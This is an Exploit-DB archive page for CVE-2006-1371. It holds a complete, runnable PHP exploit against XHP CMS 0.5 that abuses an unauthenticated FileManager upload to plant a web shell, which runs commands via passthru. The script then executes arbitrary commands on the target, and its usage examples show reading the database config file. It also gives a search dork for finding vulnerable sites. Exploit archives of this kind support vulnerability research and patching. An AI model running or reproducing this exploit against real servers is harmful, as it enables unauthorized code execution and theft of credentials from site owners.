XHP CMS 0.5 - 'upload' Remote Command Execution

EDB-ID:

1605

CVE:

2006-1371

EDB Verified:

Author:

rgod

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2006-03-22

Vulnerable App: 
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "XHP CMS <= 0.5 remote cmmnds xctn\r\n";
echo "by rgod rgod@autistici.org\r\n";
echo "site: http://retrogod.altervista.org\r\n\r\n";

echo "dork: \"powered by XHP CMS\"\r\n\r\n";

if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
echo "host:      target server (ip/hostname)\r\n";
echo "path:      path to XHP\r\n";
echo "cmd:       a shell command\r\n";
echo "Options:\r\n";
echo "   -p[port]:    specify a port other than 80\r\n";
echo "   -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /xhp/ cat ./../dbconfig.php\r\n";
echo "php ".$argv[0]." localhost /xhp/ ls -la -p81\r\n";
echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n";
die;
}

/* explaination:
 without to have admin rights, you can have access to FileManager plugin
 to upload php files:

 http://[target]/[path_to_xhp]/inc/htmlarea/plugins/FileManager/manager.php

 or

 http://[target]/[path_to_xhp]/inc/htmlarea/plugins/FileManager/standalonemanager.php

 after, you can launch commands from them, ex:

 http://[target]/[path]/filemanager/suntzu.php?cmd=cat%20./../dbconfig.php

									      */
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}

function make_seed()
{
   list($usec, $sec) = explode(' ', microtime());
   return (float) $sec + ((float) $usec * 100000);
}

$host=$argv[1];
$path=$argv[2];
$action=$argv[3];
$cmd="";$port=80;$proxy="";

for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
$cmd=urlencode($cmd);

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}


srand(make_seed());
$anumber = rand(1,99999);

   echo "[1] Uploading a shell...\r\n";
$data='-----------------------------7d61592213049c
Content-Disposition: form-data; name="dir"

/
-----------------------------7d61592213049c
Content-Disposition: form-data; name="upload"; filename="suntzu'.$anumber.'.php"
Content-Type: text/plain

<?php
if (get_magic_quotes_gpc()){$_GET[cmd]=stripslashes($_GET[cmd]);}
ini_set("max_execution_time",0);
echo "*delim*";
passthru($_GET[cmd]);
echo "*delim*";
?>
-----------------------------7d61592213049c
Content-Disposition: form-data; name="submit"

Upload
-----------------------------7d61592213049c--
';
  $packet="POST ".$p."inc/htmlarea/plugins/FileManager/images.php HTTP/1.0\r\n";
  $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61592213049c\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Content-Length: ".strlen($data)."\r\n";
  $packet.="Connection: close\r\n\r\n";
  $packet.=$data;
  #echo quick_dump($packet);
  sendpacketii($packet);
  sleep(1);
  echo "[2] Launch commands...\r\n";
  $packet="GET ".$p."filemanager/suntzu".$anumber.".php?cmd=".$cmd." HTTP/1.0\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Connection: Close\r\n\r\n";
  #echo quick_dump($packet);
  sendpacketii($packet);
  if (strstr($html,"*delim*"))
  {
  echo "Exploit succeeded...\r\n\r\n";
  $temp=explode("*delim*",$html);
  echo $temp[1];
  }
  else
  {echo "Exploit failed...\r\n";}
?>

# milw0rm.com [2006-03-22]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services